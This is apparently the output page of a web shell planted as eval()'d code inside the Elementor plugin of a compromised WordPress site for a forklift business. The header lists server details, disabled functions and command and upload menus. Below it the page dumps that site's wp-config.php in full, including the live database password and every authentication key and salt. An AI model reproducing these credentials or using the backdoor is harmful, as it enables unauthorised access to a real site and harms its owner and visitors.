|
Server IP : 172.19.0.4 / Your IP : 216.73.216.191 Web Server : nginx/1.28.3 System : Linux VM-0-4-debian 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : www ( 1000) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/data1/wwwroot/sc-forklift.com/:/tmp/) in /data1/wwwroot/sc-forklift.com/wp-content/plugins/elementor/elementor.php(1) : eval()'d code on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/data1/wwwroot/sc-forklift.com/:/tmp/) in /data1/wwwroot/sc-forklift.com/wp-content/plugins/elementor/elementor.php(1) : eval()'d code on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/data1/wwwroot/sc-forklift.com/:/tmp/) in /data1/wwwroot/sc-forklift.com/wp-content/plugins/elementor/elementor.php(1) : eval()'d code on line 341 OFF Directory (0555) : /data1/wwwroot/sc-forklift.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sc_forklift_com' );
/** Database username */
define( 'DB_USER', 'sc_forklift_com' );
/** Database password */
define( 'DB_PASSWORD', '8nAKMRzHYzedkehi' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '8k$DEGl39x#VA+L-lNY<x,SjbB-{`c!-pF]a[5!%JQ757^@f^m`tJA%I|2?6d4iu' );
define( 'SECURE_AUTH_KEY', '+d&S[u(WGPwDgoFL:T}Dk2L}l>[Vs6s5?X.]R&d~6meSC`B!&`?5bVg7MYY$*D}@' );
define( 'LOGGED_IN_KEY', ']YV<>y8v{Pj42K*a5RT}}`kiX{e0Ed-3+CYm!asGPx_o~r,zPa3HpL[:GzSZ?I~4' );
define( 'NONCE_KEY', 'en(MMAw.I7C=:rtsd0uU0YCzuR-=ki9 U2tRuGjf):s^/I( V#v%nourIhG_5[&_' );
define( 'AUTH_SALT', '31d[PbQ+ZxT1LA.:3jX`/5)[FA;y[M/l>[m+VGlM355SG4|{B`Y^j%b<K)mL1lC5' );
define( 'SECURE_AUTH_SALT', '=[:JUF5_^nf/&J=&d:<x6rWIJiJ.xWO:<Wi{qRqv{=Orwg#Rj&8T/IC-#0F 5q4|' );
define( 'LOGGED_IN_SALT', 'Q33[]mvHbMW63):~2V0_AaTX{)s72FqmEBEEYVFu7NBvvXNVALHwc!E>YU(^Qv1H' );
define( 'NONCE_SALT', '~56E#m.0a|u?KHi:6-d&1?qGJ,L2rX~ufw4JI.UULr^NvE,^2>Wb`9)zN:+_%2*X' );
/**#@-*/
define('WP_HOME','https://www.sc-forklift.com/');
define('WP_SITEURL','https://www.sc-forklift.com/');
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';